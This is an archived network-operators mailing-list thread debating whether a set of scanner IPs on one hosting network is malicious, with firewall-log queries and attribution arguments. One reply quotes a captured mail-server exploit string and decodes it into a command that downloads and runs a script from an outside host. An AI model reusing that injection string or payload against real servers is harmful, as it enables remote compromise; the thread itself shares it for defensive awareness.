https://twitter.com/GreyNoiseIO/status/1129017971135995904 https://twitter.com/JayTHL/status/1128718224965685248 Friday Questionaire: Is there anybody on this list who keeps firewall logs and who DOESN'T have numerous hits recorded therein from one or more of the following IP addresses? 80.82.64.21 scanner29.openportstats.com 80.82.70.2 scanner8.openportstats.com 80.82.70.198 scanner21.openportstats.com 80.82.70.216 scanner13.openportstats.com 80.82.78.104 scanner151.openportstats.com 89.248.160.132 scanner15.openportstats.com 89.248.162.168 scanner5.openportstats.com 89.248.168.62 scanner1.openportstats.com 89.248.168.63 scanner2.openportstats.com 89.248.168.73 scanner3.openportstats.com 89.248.168.74 scanner4.openportstats.com 89.248.168.170 scanner17.openportstats.com 89.248.168.196 scanner16.openportstats.com 89.248.171.38 scanner7.openportstats.com 89.248.171.57 scanner20.openportstats.com 89.248.172.18 scanner25.openportstats.com 89.248.172.23 scanner27.openportstats.com 93.174.91.31 scanner10.openportstats.com 93.174.91.34 scanner11.openportstats.com 93.174.91.35 scanner12.openportstats.com 93.174.93.98 scanner18.openportstats.com 93.174.93.149 scanner6.openportstats.com 93.174.93.241 scanner14.openportstats.com 93.174.95.37 scanner19.openportstats.com 93.174.95.42 scanner8.openportstats.com 94.102.51.31 scanner31.openportstats.com 94.102.51.98 scanner55.openportstats.com 94.102.52.245 scanner9.openportstats.com NOTE: Dshield has already assigned an 8 rating on their Badness Richter Scale to the specific one of the above addresses that's been poking me personally in recent days: https://www.dshield.org/ipinfo.html?ip=89.248.162.168 https://www.dshield.org/ipdetails.html?ip=89.248.162.168 And the Dshield rating is *just* based on the probing. The addition of malware slinging also puts this whole mess over the top entirely. Oh! And I'll save you all the time looking it up.... 100% of the IPs listed above are on AS202425 "IP Volume, Inc. allegedly of the Seychelles Islands, where the employees and management are no doubt enjoying their luxurious and expansive new corporate headquarters... https://bit.ly/2ZBayc4 Regards, rfg P.S. This is the kind of thing that everybody really should expect when the U.S. Department of Defense takes it upon itself to start up its own little private and unauthorized (cyber)war on Russia, wthout first obtaining the consent of Congress... you know, kinda like that ancient yellowed document that nobody in this country reads anymore says they should. And apparently, the DoD was understandably not anxious to brief even the President about all this... https://www.businessinsider.com/us-officials-hide-russia-cyber-operation-tru... (Not that anybody can really blame them for THAT.)
On Friday, 21 June, 2019 18:14, Ronald F. Guilmette <rfg@tristatelogic.com> wrote:
https://twitter.com/GreyNoiseIO/status/1129017971135995904 https://twitter.com/JayTHL/status/1128718224965685248
Sorry, don't twitter ... Too much malicious JavaScript there.
Friday Questionaire:
Is there anybody on this list who keeps firewall logs and who DOESN'T have numerous hits recorded therein from one or more of the following IP addresses?
80.82.64.21 scanner29.openportstats.com 80.82.70.2 scanner8.openportstats.com 80.82.70.198 scanner21.openportstats.com 80.82.70.216 scanner13.openportstats.com 80.82.78.104 scanner151.openportstats.com 89.248.160.132 scanner15.openportstats.com 89.248.162.168 scanner5.openportstats.com 89.248.168.62 scanner1.openportstats.com 89.248.168.63 scanner2.openportstats.com 89.248.168.73 scanner3.openportstats.com 89.248.168.74 scanner4.openportstats.com 89.248.168.170 scanner17.openportstats.com 89.248.168.196 scanner16.openportstats.com 89.248.171.38 scanner7.openportstats.com 89.248.171.57 scanner20.openportstats.com 89.248.172.18 scanner25.openportstats.com 89.248.172.23 scanner27.openportstats.com 93.174.91.31 scanner10.openportstats.com 93.174.91.34 scanner11.openportstats.com 93.174.91.35 scanner12.openportstats.com 93.174.93.98 scanner18.openportstats.com 93.174.93.149 scanner6.openportstats.com 93.174.93.241 scanner14.openportstats.com 93.174.95.37 scanner19.openportstats.com 93.174.95.42 scanner8.openportstats.com 94.102.51.31 scanner31.openportstats.com 94.102.51.98 scanner55.openportstats.com 94.102.52.245 scanner9.openportstats.com
I have just a few. They have all been blocked. There have been no incoming sessions established, nor any outbound sessions to these addresses. Why do you think it is a problem and not just run-of-the-mill background radiation on the Internet? Do you (or your endpoints) not have a firewall to block such things? sqlite> select * from hosts where name like '%openports%'; id address name description asn lastupdate ---------- ------------- ---------------------------- ----------- ---------- ---------- 3662 93.174.93.241 scanner14.openportstats.com. 202425 1561209704 5061 93.174.95.42 scanner8.openportstats.com. 202425 1560718494 11894 93.174.93.149 scanner6.openportstats.com. 202425 1560732443 17720 93.174.93.98 scanner18.openportstats.com. 202425 1560640554 54208 80.82.70.2 scanner8.openportstats.com. 202425 1560774033 54790 89.248.160.13 scanner15.openportstats.com. 202425 1560682732 55081 89.248.168.19 scanner16.openportstats.com. 202425 1561158220 55629 89.248.168.17 scanner17.openportstats.com. 202425 1560817976 59858 89.248.171.57 scanner20.openportstats.com. 202425 1560800216 64626 89.248.171.38 scanner7.openportstats.com. 202425 1560841829 70081 93.174.95.37 scanner19.openportstats.com. 202425 1560802023 72978 80.82.70.216 scanner13.openportstats.com. 202425 1560709312 74711 94.102.52.245 scanner9.openportstats.com. 202425 1560589038 80358 89.248.162.16 scanner5.openportstats.com. 202425 1561217966 86148 89.248.172.18 scanner25.openportstats.com. 202425 1560884061 89484 94.102.51.31 scanner31.openportstats.com. 202425 1561199715 90131 80.82.70.198 scanner21.openportstats.com. 202425 1560776777 90531 80.82.78.104 scanner151.openportstats.com 202425 1561150052 91641 80.82.64.21 scanner29.openportstats.com. 202425 1561184548 104810 94.102.51.98 scanner55.openportstats.com. 202425 1561138118 sqlite> select * from asns where asn=202425; asn country rir allocated description lastupdate ---------- ---------- ---------- ---------- --------------- ---------- 202425 SC ripencc 2018-05-17 INT-NETWORK, SC 1561217966 sqlite> select srcaddress, count(*), min(localtime), max(localtime) from firewalllog where srcaddress in (select address from hosts where name like '%openportstats.com.') group by srcaddress; srcaddress count(*) min(localtime) max(localtime) ----------- ---------- ------------------------------ ------------------------------ 80.82.64.21 6 2019-03-28 05:21:13.919 -06:00 2019-03-31 06:47:28.309 -06:00 80.82.70.2 208 2019-01-23 12:58:02.557 -07:00 2019-04-02 06:37:43.125 -06:00 80.82.70.19 114 2019-03-25 14:13:17.058 -06:00 2019-04-02 06:39:57.214 -06:00 80.82.70.21 17970 2019-02-25 13:34:52.202 -07:00 2019-04-24 19:27:58.113 -06:00 80.82.78.10 767 2019-03-26 08:37:53.799 -06:00 2019-06-21 15:27:05.791 -06:00 89.248.160. 1754 2019-01-24 12:40:58.764 -07:00 2019-04-13 05:02:00.866 -06:00 89.248.162. 1384 2019-03-09 16:21:40.538 -07:00 2019-06-22 09:39:26.809 -06:00 89.248.168. 43 2019-01-25 18:52:41.512 -07:00 2019-03-28 06:57:15.269 -06:00 89.248.168. 1543 2019-01-24 23:03:14.052 -07:00 2019-04-23 01:46:26.558 -06:00 89.248.171. 22 2019-02-10 12:14:00.168 -07:00 2019-02-12 14:16:40.212 -07:00 89.248.171. 1850 2019-02-01 18:06:15.893 -07:00 2019-06-17 13:36:56.062 -06:00 89.248.172. 3 2019-03-18 20:33:50.209 -06:00 2019-03-23 16:47:31.949 -06:00 93.174.93.9 67 2018-12-08 17:42:28.122 -07:00 2019-04-01 03:24:06.896 -06:00 93.174.93.1 16 2018-12-04 03:34:47.534 -07:00 2019-05-07 01:34:27.308 -06:00 93.174.93.2 1661 2018-11-23 10:13:06.957 -07:00 2019-06-22 07:21:44.239 -06:00 93.174.95.3 144 2019-02-20 08:06:52.282 -07:00 2019-02-28 02:30:39.109 -07:00 93.174.95.4 252 2018-11-24 22:14:19.061 -07:00 2019-03-03 19:04:48.709 -07:00 94.102.51.3 262 2019-03-24 10:03:55.679 -06:00 2019-06-22 04:35:15.886 -06:00 94.102.51.9 32 2019-04-28 08:52:43.818 -06:00 2019-05-17 11:22:16.166 -06:00 94.102.52.2 38 2019-02-28 12:45:52.949 -07:00 2019-03-07 07:30:03.547 -07:00
NOTE: Dshield has already assigned an 8 rating on their Badness Richter Scale to the specific one of the above addresses that's been poking me personally in recent days:
https://www.dshield.org/ipinfo.html?ip=89.248.162.168 https://www.dshield.org/ipdetails.html?ip=89.248.162.168
And the Dshield rating is *just* based on the probing. The addition of malware slinging also puts this whole mess over the top entirely.
What malware slinging? I see none of that. Merely unsolicited incoming connection attempts. I note that neither the ASN in question nor the addresses are on the DROP list.
Oh! And I'll save you all the time looking it up.... 100% of the IPs listed above are on AS202425 "IP Volume, Inc. allegedly of the Seychelles Islands, where the employees and management are no doubt enjoying their luxurious and expansive new corporate headquarters...
Good for them. Everyone should have luxurious and expansive corporate headquarters.
Malicious link detected. -- The fact that there's a Highway to Hell but only a Stairway to Heaven says a lot about anticipated traffic volume.
AS202425 = AS29073. Formerly known as Quasi Networks / Ecatel. See previous NANOG thread here: https://mailman.nanog.org/pipermail/nanog/2017-August/091956.html On Sat, Jun 22, 2019 at 10:03 AM Keith Medcalf <kmedcalf@dessus.com> wrote:
On Friday, 21 June, 2019 18:14, Ronald F. Guilmette <rfg@tristatelogic.com> wrote:
https://twitter.com/GreyNoiseIO/status/1129017971135995904 https://twitter.com/JayTHL/status/1128718224965685248
Sorry, don't twitter ... Too much malicious JavaScript there.
Friday Questionaire:
Is there anybody on this list who keeps firewall logs and who DOESN'T have numerous hits recorded therein from one or more of the following IP addresses?
80.82.64.21 scanner29.openportstats.com 80.82.70.2 scanner8.openportstats.com 80.82.70.198 scanner21.openportstats.com 80.82.70.216 scanner13.openportstats.com 80.82.78.104 scanner151.openportstats.com 89.248.160.132 scanner15.openportstats.com 89.248.162.168 scanner5.openportstats.com 89.248.168.62 scanner1.openportstats.com 89.248.168.63 scanner2.openportstats.com 89.248.168.73 scanner3.openportstats.com 89.248.168.74 scanner4.openportstats.com 89.248.168.170 scanner17.openportstats.com 89.248.168.196 scanner16.openportstats.com 89.248.171.38 scanner7.openportstats.com 89.248.171.57 scanner20.openportstats.com 89.248.172.18 scanner25.openportstats.com 89.248.172.23 scanner27.openportstats.com 93.174.91.31 scanner10.openportstats.com 93.174.91.34 scanner11.openportstats.com 93.174.91.35 scanner12.openportstats.com 93.174.93.98 scanner18.openportstats.com 93.174.93.149 scanner6.openportstats.com 93.174.93.241 scanner14.openportstats.com 93.174.95.37 scanner19.openportstats.com 93.174.95.42 scanner8.openportstats.com 94.102.51.31 scanner31.openportstats.com 94.102.51.98 scanner55.openportstats.com 94.102.52.245 scanner9.openportstats.com
I have just a few. They have all been blocked. There have been no incoming sessions established, nor any outbound sessions to these addresses.
Why do you think it is a problem and not just run-of-the-mill background radiation on the Internet?
Do you (or your endpoints) not have a firewall to block such things?
sqlite> select * from hosts where name like '%openports%'; id address name description asn lastupdate ---------- ------------- ---------------------------- ----------- ---------- ---------- 3662 93.174.93.241 scanner14.openportstats.com. 202425 1561209704 5061 93.174.95.42 scanner8.openportstats.com. 202425 1560718494 11894 93.174.93.149 scanner6.openportstats.com. 202425 1560732443 17720 93.174.93.98 scanner18.openportstats.com. 202425 1560640554 54208 80.82.70.2 scanner8.openportstats.com. 202425 1560774033 54790 89.248.160.13 scanner15.openportstats.com. 202425 1560682732 55081 89.248.168.19 scanner16.openportstats.com. 202425 1561158220 55629 89.248.168.17 scanner17.openportstats.com. 202425 1560817976 59858 89.248.171.57 scanner20.openportstats.com. 202425 1560800216 64626 89.248.171.38 scanner7.openportstats.com. 202425 1560841829 70081 93.174.95.37 scanner19.openportstats.com. 202425 1560802023 72978 80.82.70.216 scanner13.openportstats.com. 202425 1560709312 74711 94.102.52.245 scanner9.openportstats.com. 202425 1560589038 80358 89.248.162.16 scanner5.openportstats.com. 202425 1561217966 86148 89.248.172.18 scanner25.openportstats.com. 202425 1560884061 89484 94.102.51.31 scanner31.openportstats.com. 202425 1561199715 90131 80.82.70.198 scanner21.openportstats.com. 202425 1560776777 90531 80.82.78.104 scanner151.openportstats.com 202425 1561150052 91641 80.82.64.21 scanner29.openportstats.com. 202425 1561184548 104810 94.102.51.98 scanner55.openportstats.com. 202425 1561138118
sqlite> select * from asns where asn=202425; asn country rir allocated description lastupdate ---------- ---------- ---------- ---------- --------------- ---------- 202425 SC ripencc 2018-05-17 INT-NETWORK, SC 1561217966
sqlite> select srcaddress, count(*), min(localtime), max(localtime) from firewalllog where srcaddress in (select address from hosts where name like '%openportstats.com.') group by srcaddress; srcaddress count(*) min(localtime) max(localtime) ----------- ---------- ------------------------------ ------------------------------ 80.82.64.21 6 2019-03-28 05:21:13.919 -06:00 2019-03-31 06:47:28.309 -06:00 80.82.70.2 208 2019-01-23 12:58:02.557 -07:00 2019-04-02 06:37:43.125 -06:00 80.82.70.19 114 2019-03-25 14:13:17.058 -06:00 2019-04-02 06:39:57.214 -06:00 80.82.70.21 17970 2019-02-25 13:34:52.202 -07:00 2019-04-24 19:27:58.113 -06:00 80.82.78.10 767 2019-03-26 08:37:53.799 -06:00 2019-06-21 15:27:05.791 -06:00 89.248.160. 1754 2019-01-24 12:40:58.764 -07:00 2019-04-13 05:02:00.866 -06:00 89.248.162. 1384 2019-03-09 16:21:40.538 -07:00 2019-06-22 09:39:26.809 -06:00 89.248.168. 43 2019-01-25 18:52:41.512 -07:00 2019-03-28 06:57:15.269 -06:00 89.248.168. 1543 2019-01-24 23:03:14.052 -07:00 2019-04-23 01:46:26.558 -06:00 89.248.171. 22 2019-02-10 12:14:00.168 -07:00 2019-02-12 14:16:40.212 -07:00 89.248.171. 1850 2019-02-01 18:06:15.893 -07:00 2019-06-17 13:36:56.062 -06:00 89.248.172. 3 2019-03-18 20:33:50.209 -06:00 2019-03-23 16:47:31.949 -06:00 93.174.93.9 67 2018-12-08 17:42:28.122 -07:00 2019-04-01 03:24:06.896 -06:00 93.174.93.1 16 2018-12-04 03:34:47.534 -07:00 2019-05-07 01:34:27.308 -06:00 93.174.93.2 1661 2018-11-23 10:13:06.957 -07:00 2019-06-22 07:21:44.239 -06:00 93.174.95.3 144 2019-02-20 08:06:52.282 -07:00 2019-02-28 02:30:39.109 -07:00 93.174.95.4 252 2018-11-24 22:14:19.061 -07:00 2019-03-03 19:04:48.709 -07:00 94.102.51.3 262 2019-03-24 10:03:55.679 -06:00 2019-06-22 04:35:15.886 -06:00 94.102.51.9 32 2019-04-28 08:52:43.818 -06:00 2019-05-17 11:22:16.166 -06:00 94.102.52.2 38 2019-02-28 12:45:52.949 -07:00 2019-03-07 07:30:03.547 -07:00
NOTE: Dshield has already assigned an 8 rating on their Badness Richter Scale to the specific one of the above addresses that's been poking me personally in recent days:
https://www.dshield.org/ipinfo.html?ip=89.248.162.168 https://www.dshield.org/ipdetails.html?ip=89.248.162.168
And the Dshield rating is *just* based on the probing. The addition of malware slinging also puts this whole mess over the top entirely.
What malware slinging? I see none of that. Merely unsolicited incoming connection attempts. I note that neither the ASN in question nor the addresses are on the DROP list.
Oh! And I'll save you all the time looking it up.... 100% of the IPs listed above are on AS202425 "IP Volume, Inc. allegedly of the Seychelles Islands, where the employees and management are no doubt enjoying their luxurious and expansive new corporate headquarters...
Good for them. Everyone should have luxurious and expansive corporate headquarters.
Malicious link detected.
-- The fact that there's a Highway to Hell but only a Stairway to Heaven says a lot about anticipated traffic volume.
Hello, On Sat, Jun 22, 2019 at 11:01:13AM -0600, Keith Medcalf wrote:
What malware slinging?
Some user there is trying to exploit CVE-2018-10149: 2019-06-11 11:28:35 SMTP protocol synchronization error (next input sent too soon: pipelining was not advertised): rejected "RCPT TO:<bin+${run{\x2fbin\x2fsh\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2eyyearz\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyyearz\x20\x2dn\x20\x26\x22}}@myhostname>" H=(myhostname) [89.248.171.57] next input="QUIT\n" Plus another 17 attempts by that IP through to 19 June. $ printf "\x2fbin\x2fsh\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2eyyearz\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyyearz\x20\x2dn\x20\x26\x22\n" /bin/sh -c "wget --no-check-certificate -T 36 hxxps://185.162.235.211/ldm1ip -O /root/.yyearz && sh /root/.yyearz -n &" (I replaced https with hxxps to prevent auto-link-followers from hitting the site.) Cheers, Andy
In message <f2682032aa620f49aa50b30579a9357f@mail.dessus.com>, "Keith Medcalf" <kmedcalf@dessus.com> wrote:
On Friday, 21 June, 2019 18:14, Ronald F. Guilmette <rfg@tristatelogic.= com> wrote:
https://twitter.com/GreyNoiseIO/status/1129017971135995904 https://twitter.com/JayTHL/status/1128718224965685248
Sorry, don't twitter ... Too much malicious JavaScript there.
Can you be more, um, specific?
80.82.64.21 scanner29.openportstats.com ...
Why do you think it is a problem and not just run-of-the-mill background radiation on the Internet?
It's not a problem for me personally... other than the fact that these goofballs are filling up my log files to no good end. I just wanted others to be aware of this (apparently ongoing) garbage. And I wouldn't want anyone to be fooled by the mere fact that this openportstats.com domain has a sort-of a web site. It's still 100% illegitimate.
Do you (or your endpoints) not have a firewall to block such things?
I do, and I hope everyone else does also.
What malware slinging? I see none of that.
You didn't look at the Twitter reports.
Malicious link detected.
If you say so. (It's actually just a cute picture.) Regards, rfg
On 6/22/19 2:13 AM, Ronald F. Guilmette wrote:
https://twitter.com/GreyNoiseIO/status/1129017971135995904 https://twitter.com/JayTHL/status/1128718224965685248
Friday Questionaire:
Is there anybody on this list who keeps firewall logs and who DOESN'T have numerous hits recorded therein from one or more of the following IP addresses?
80.82.64.21 scanner29.openportstats.com 80.82.70.2 scanner8.openportstats.com 80.82.70.198 scanner21.openportstats.com 80.82.70.216 scanner13.openportstats.com 80.82.78.104 scanner151.openportstats.com 89.248.160.132 scanner15.openportstats.com 89.248.162.168 scanner5.openportstats.com 89.248.168.62 scanner1.openportstats.com 89.248.168.63 scanner2.openportstats.com 89.248.168.73 scanner3.openportstats.com 89.248.168.74 scanner4.openportstats.com 89.248.168.170 scanner17.openportstats.com 89.248.168.196 scanner16.openportstats.com 89.248.171.38 scanner7.openportstats.com 89.248.171.57 scanner20.openportstats.com 89.248.172.18 scanner25.openportstats.com 89.248.172.23 scanner27.openportstats.com 93.174.91.31 scanner10.openportstats.com 93.174.91.34 scanner11.openportstats.com 93.174.91.35 scanner12.openportstats.com 93.174.93.98 scanner18.openportstats.com 93.174.93.149 scanner6.openportstats.com 93.174.93.241 scanner14.openportstats.com 93.174.95.37 scanner19.openportstats.com 93.174.95.42 scanner8.openportstats.com 94.102.51.31 scanner31.openportstats.com 94.102.51.98 scanner55.openportstats.com 94.102.52.245 scanner9.openportstats.com
NOTE: Dshield has already assigned an 8 rating on their Badness Richter Scale to the specific one of the above addresses that's been poking me personally in recent days:
https://www.dshield.org/ipinfo.html?ip=89.248.162.168 https://www.dshield.org/ipdetails.html?ip=89.248.162.168
And the Dshield rating is *just* based on the probing. The addition of malware slinging also puts this whole mess over the top entirely.
Oh! And I'll save you all the time looking it up.... 100% of the IPs listed above are on AS202425 "IP Volume, Inc. allegedly of the Seychelles Islands, where the employees and management are no doubt enjoying their luxurious and expansive new corporate headquarters...
It's just a port/vulnerability scanner, I really don't see anything special about this particular case. "IP Volume" is actually a new brand of Ecatel/Quasi Networks, servers are in a Dutch datacenter.
P.S. This is the kind of thing that everybody really should expect when the U.S. Department of Defense takes it upon itself to start up its own little private and unauthorized (cyber)war on Russia, wthout first obtaining the consent of Congress... you know, kinda like that ancient yellowed document that nobody in this country reads anymore says they should. And apparently, the DoD was understandably not anxious to brief even the President about all this...
https://www.businessinsider.com/us-officials-hide-russia-cyber-operation-tru...
(Not that anybody can really blame them for THAT.) What does that have to do with the vulnerability scanner? Also: You know it doesn't make any sense, right?
-- Filip Hruska Linux System Administrator
On Sat, 22 Jun 2019, Filip Hruska wrote:
It's just a port/vulnerability scanner, I really don't see anything special about this particular case.
they are pushing exploits. trying to RCE, wget a binary, chmod 777 on routers and rm -rf files. this goes way beyond scanner and into criminal trespass and destruction of property. https://twitter.com/JayTHL/status/1128700101675954176 remain ignorant if you want. -Dan
It's just a port/vulnerability scanner, I really don't see anything special about this particular case.
they are pushing exploits. trying to RCE, wget a binary, chmod 777 on routers and rm -rf files.
this goes way beyond scanner and into criminal trespass and destruction of property.
having trouble following the attribution. yes, of course there are folk trying to exploit. but missing the link that *these* folk are. e.g. i am aware of researchers scanning to see patching spread and trying to make a conext paper dreadline this week or infocom next month. hard to tell the sheep from the goats and the wolf from the sheep. i get the appended. sheep or wholf? i sure do not claim to be smart enough to know. but i sure am glad others are </snark>. randy --- Jun 20 18:53:23 winnti-scanner-victims-will-be-notified.threatsinkhole.com �V�Dz/� Jun 20 18:53:23 ran rsyslogd: imtcp imtcp: Framing Error in received TCP message from peer: (hostname) winnti-scanner-victims-will-be-notified.threatsinkhole.com, (ip) winnti-scanner-victims-will-be-notified.threatsinkhole.com: delimiter is not SP but has ASCII value -51. [v8.32.0] Jun 20 18:53:55 winnti-scanner-victims-will-be-notified.threatsinkhole.com �t�C� #000F#000#000#000#000#000����#000#000#000#000#001#004F#000#000#000#003#010�=)�#027�$��#000#000#000#000#000++#000#000#000#000(#000#000#000#000#000#000#000#000#000#000#000#000#000#000#000#001#001#000#000#000#000#026#000#000#000#000#000#000#000#000#000#000#000#000#000#000#000#000#000#000#000#004#000#000#000#000#000#000#000#000#000#004#000#000#000#000
On Sun, 23 Jun 2019, Randy Bush wrote:
It's just a port/vulnerability scanner, I really don't see anything special about this particular case. they are pushing exploits. trying to RCE, wget a binary, chmod 777 on routers and rm -rf files.
this goes way beyond scanner and into criminal trespass and destruction of property.
https://twitter.com/JayTHL/status/1128700101675954176 having trouble following the attribution. yes, of course there are folk trying to exploit. but missing the link that *these* folk are.
https://pbs.twimg.com/media/D6oBGYPUwAECG09.png you're trying to defend them? -Dan
On 24/06/2019 00:23, Randy Bush wrote:
e.g. i am aware of researchers scanning to see patching spread and trying to make a conext paper dreadline this week or infocom next month.
hard to tell the sheep from the goats and the wolf from the sheep. i get the appended. sheep or wholf? i sure do not claim to be smart enough to know. but i sure am glad others are </snark>. Greynoise can be your friend: https://greynoise.io/about https://viz.greynoise.io/table
-Hank
randy
---
I chuckle the most at the original twitter post from Greynoise : "We have revoked the benign tag for OpenPortStats[.]com" Did anyone actually think such a thing would be legitimate to start with? :) On Mon, Jun 24, 2019 at 12:26 AM Hank Nussbacher <hank@efes.iucc.ac.il> wrote:
On 24/06/2019 00:23, Randy Bush wrote:
e.g. i am aware of researchers scanning to see patching spread and trying to make a conext paper dreadline this week or infocom next month.
hard to tell the sheep from the goats and the wolf from the sheep. i get the appended. sheep or wholf? i sure do not claim to be smart enough to know. but i sure am glad others are </snark>. Greynoise can be your friend: https://greynoise.io/about https://viz.greynoise.io/table
-Hank
randy
---
On Fri, Jun 21, 2019 at 05:13:35PM -0700, Ronald F. Guilmette wrote:
Is there anybody on this list who keeps firewall logs and who DOESN'T have numerous hits recorded therein from one or more of the following IP addresses?
Well, I *did*, but having noticed their activities and grown tired of them, I now just drop their traffic on the floor (and log it). They are one of several operations that I've noticed who have taken it upon themselves to poke at open (and closed) ports without bothering to ask. Assuming for a moment the most charitable interpretation of their collective actions -- that they are earnest researching problems with the intention of helping to solve them -- this is still highly problematic for two reasons: 1. They didn't ask permission. 2. Whether they realize it or not, they're building a target. When, not if, their results database(s) are compromised, they will have furnished the attackers with a comprehensive target list, painstakingly gathered at no cost to them and thoughtfully annotated with whatever metadata has been collected. ---rsk
See inline responses... ‐‐‐‐‐‐‐ Original Message ‐‐‐‐‐‐‐ On Friday, June 21, 2019 6:13 PM, Ronald F. Guilmette <rfg@tristatelogic.com> wrote:
https://twitter.com/GreyNoiseIO/status/1129017971135995904 https://twitter.com/JayTHL/status/1128718224965685248
After forwarding these links to a sanitized client on another network, I saw nothing on the "twitter reports" which suggest these subnets are doing anything other than port scanning. For those who refuse to follow Twitter links (I'm with ya): There is one cropped screen shot of a pcap with some incomplete information for a entirely different subnet and zero useful intel. Am I missing something, or do you have any actual log files to support your claims of malware slinging from these guys? ....and I do not want "popularity contest" results of the twitter-verse - to protect our networks. Real data is needed. We need to know what we are looking for specifically. As for the network probing - this is why those activities are blocked and other techniques are implemented to obscure the usefulness of the data they collect. The way I see it... If people go poking their hands in the honey jars without permission, they may just get something they do not want or expect (I hear non-consensual probing can infect the violator with certain diseases, and that would be a shame)
Friday Questionaire:
Is there anybody on this list who keeps firewall logs and who DOESN'T have numerous hits recorded therein from one or more of the following IP addresses?
[snip]
NOTE: Dshield has already assigned an 8 rating on their Badness Richter Scale to the specific one of the above addresses that's been poking me personally in recent days:
https://www.dshield.org/ipinfo.html?ip=89.248.162.168 https://www.dshield.org/ipdetails.html?ip=89.248.162.168
And the Dshield rating is just based on the probing. The addition of malware slinging also puts this whole mess over the top entirely.
What malware?
Oh! And I'll save you all the time looking it up.... 100% of the IPs listed above are on AS202425 "IP Volume, Inc. allegedly of the Seychelles Islands, where the employees and management are no doubt enjoying their luxurious and expansive new corporate headquarters...
Sounds like a good deal.
I do not follow external links generally, as a rule, without compelling need and additional measures taken.
Regards, rfg
P.S. This is the kind of thing that everybody really should expect when the U.S. Department of Defense takes it upon itself to start up its own little private and unauthorized (cyber)war on Russia, wthout first obtaining the consent of Congress... you know, kinda like that ancient yellowed document that nobody in this country reads anymore says they should. And apparently, the DoD was understandably not anxious to brief even the President about all this...
https://www.businessinsider.com/us-officials-hide-russia-cyber-operation-tru...
(Not that anybody can really blame them for THAT.)
P.S - Lets try to keep politics off the list. We get enough of that everywhere else. Thanks, Brad
Hi Brad, On Sun, Jun 23, 2019 at 09:43:00PM +0000, Brad via NANOG wrote:
On Friday, June 21, 2019 6:13 PM, Ronald F. Guilmette <rfg@tristatelogic.com> wrote:
https://twitter.com/GreyNoiseIO/status/1129017971135995904 https://twitter.com/JayTHL/status/1128718224965685248
After forwarding these links to a sanitized client on another network, I saw nothing on the "twitter reports" which suggest these subnets are doing anything other than port scanning.
Earlier I posted one example of an attempt to exploit CVE-2019-10149 to execute commands as root on one of my machines. I have 17 other examples from the same IP that try to do similar things via the same exploit, though there are differences which suggest to me that multiple users or groups are using openportstats for this purpose. Would you like to see them? I think that trying to actively exploit a bug to execute arbitrary commands is a lot different to mere port scanning. They aren't all harmless commands either; some of them install rootkits and remote shells. Cheers, Andy
participants (11)
-
Andy Smith
-
Brad
-
Dan Hollis
-
Filip Hruska
-
Hank Nussbacher
-
Keith Medcalf
-
Randy Bush
-
Rich Kulawiec
-
Ronald F. Guilmette
-
Tom Beecher
-
Troy Mursch